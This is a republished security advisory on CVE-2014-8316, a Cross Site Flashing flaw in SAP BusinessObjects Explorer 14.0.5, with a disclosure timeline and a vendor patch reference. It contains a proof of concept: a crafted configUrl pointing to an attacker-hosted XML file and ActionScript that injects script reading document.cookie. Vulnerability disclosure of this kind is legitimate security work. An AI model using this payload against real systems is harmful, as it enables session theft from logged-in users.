SAP BusinessObjects Explorer 14.0.5 Cross Site Flashing

2014-10-12 / 2014-10-23
Credit: Stefan Horlacher
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2014-8316
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

####################################################################### # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # ####################################################################### # # Product: BusinessObjects Explorer # Vendor: SAP AG # Subject: Cross Site Flashing # Risk: High # Effect: Remotely exploitable # Author: Stefan Horlacher # Date: 2014-10-10 # SAP Security Note: 1908647 [0] # ####################################################################### Abstract: ------------- BusinessObjects Explorer is vulnerable against Cross Site Flashing [1] attacks, allowing an attacker to e.g. steal the victim's session. This vulnerability requires the victim to click on a malicious link prepared by the attacker. Affected: --------- Vulnerable: SAP BusinessObjects Explorer version 14.0.5 (build 882) Not tested: Other versions of BusinessObjects Explorer Technical Description: ---------------------- The Flash file suffers from a Cross Site Flashing vulnerability. It is possible to directly load and display the com_businessobjects_polestar_bootstrap.swf Flash file and specify a configUrl. This requires the victim to be logged and the attacker needs to know the /webres/ URL, which is known as soon as the attacker is in possession of valid credentials. The configuration file specified in the configURL parameter may reside on a foreign host. The configuration file itself may contain URLs of further Flash files residing on a foreign domain. If successful, the victim loads foreign Flash files, which leads to Cross Site Flashing. The example below loads a Flash file, which injects JavaScript into the DOM of the originating domain. URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml package { import flash.display.Sprite; import flash.events.Event; import flash.external.ExternalInterface; public class Main extends Sprite { public function Main():void { ExternalInterface.call("document.write", "<script>alert(document.cookie)</script>"); } } } Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml: <p:configuration xmlns:p="http://www.businessobjects.com/2007/platform" p:codebase="plugins/"> <p:splashLocation p:id="com_businessobjects_polestar_splashscreen" p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/> <p:bundles> <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/> <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/> <p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/> <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/> [CUT BY COMPASS] Timeline: --------- 2013-06-06: Discovery by Stefan Horlacher 2013-06-26: Initial vendor notification 2013-12-10: Vendor releases patch and SAP Security Note 1908647 2014-10-10: Disclosure of the advisory References: ----------- [0] https://service.sap.com/sap/support/notes/1908647 [1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top